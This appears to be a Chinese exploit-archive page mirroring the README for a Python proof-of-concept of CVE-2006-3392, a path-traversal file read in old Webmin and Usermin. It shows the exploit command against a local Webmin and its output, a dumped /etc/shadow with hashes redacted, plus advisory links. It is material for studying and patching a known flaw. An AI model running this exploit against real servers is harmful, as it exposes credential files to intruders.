关联漏洞
标题:
Webmin/Usermin未明信息泄露漏洞
(CVE-2006-3392)
描述:Webmin 1.290之前版本和Usermin 1.220之前版本在解码HTML之前调用simplify_path 函数,可以使远程攻击者读取任意文件,比如使用"..%01"序列,该序列可在从文件名中删除诸如"%01"等字节之前绕过"../" 序列的删除。注: 此漏洞不同于CVE-2006-3274。
介绍
# CVE-2006-3392
## Description
Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML, which allows remote attackers to read arbitrary files, as demonstrated using "..%01" sequences, which bypass the removal of "../" sequences before bytes such as "%01" are removed from the filename. NOTE: This is a different issue than CVE-2006-3274.
## Execution
```
$ python3 CVE-2006-3392.py -u http://127.0.0.1:10000
_______ ________ ___ ___ ___ __ ____ ____ ___ ___
/ ____\ \ / / ____| |__ \ / _ \ / _ \ / / |___ \___ \ / _ \__ \
| | \ \ / /| |__ ______ ) | | | | | | |/ /_ ______ __) |__) | (_) | ) |
| | \ \/ / | __|______/ /| | | | | | | '_ \______|__ <|__ < \__, |/ /
| |____ \ / | |____ / /_| |_| | |_| | (_) | ___) |__) | / // /_
\_____| \/ |______| |____|\___/ \___/ \___/ |____/____/ /_/|____|
[Coded by MrEmpy]
[*] File path: /etc/shadow
root:[REDACTED]:17406:0:99999:7:::
daemon:*:17047:0:99999:7:::
bin:*:17047:0:99999:7:::
sys:*:17047:0:99999:7:::
sync:*:17047:0:99999:7:::
games:*:17047:0:99999:7:::
man:*:17047:0:99999:7:::
lp:*:17047:0:99999:7:::
mail:*:17047:0:99999:7:::
news:*:17047:0:99999:7:::
uucp:*:17047:0:99999:7:::
proxy:*:17047:0:99999:7:::
www-data:*:17047:0:99999:7:::
backup:*:17047:0:99999:7:::
list:*:17047:0:99999:7:::
irc:*:17047:0:99999:7:::
gnats:*:17047:0:99999:7:::
nobody:*:17047:0:99999:7:::
libuuid:!:17047:0:99999:7:::
Debian-exim:!:17047:0:99999:7:::
statd:*:17047:0:99999:7:::
sshd:*:17047:0:99999:7:::
mysql:!:17047:0:99999:7:::
proftpd:!:17406:0:99999:7:::
ftp:*:17406:0:99999:7:::
webmaster:[REDACTED]:17406:0:99999:7:::
```
## References
* https://nvd.nist.gov/vuln/detail/CVE-2006-3392
* http://attrition.org/pipermail/vim/2006-July/000923.html
* http://attrition.org/pipermail/vim/2006-June/000912.html
* http://secunia.com/advisories/20892
* http://secunia.com/advisories/21105
* http://secunia.com/advisories/21365
* http://secunia.com/advisories/22556
* http://security.gentoo.org/glsa/glsa-200608-11.xml
* http://www.debian.org/security/2006/dsa-1199
* http://www.kb.cert.org/vuls/id/999601
* http://www.mandriva.com/security/advisories?name=MDKSA-2006:125
* http://www.osvdb.org/26772
* http://www.securityfocus.com/archive/1/439653/100/0/threaded
* http://www.securityfocus.com/archive/1/440125/100/0/threaded
* http://www.securityfocus.com/archive/1/440466/100/0/threaded
* http://www.securityfocus.com/archive/1/440493/100/0/threaded
* http://www.securityfocus.com/bid/18744
* http://www.vupen.com/english/advisories/2006/2612
* http://www.webmin.com/changes.html
文件快照
[4.0K] /data/pocs/16212920a82c70c6aa2f30be95c119d3f62cb174
├── [1.0K] CVE-2006-3392.py
├── [ 34K] LICENSE
└── [2.6K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。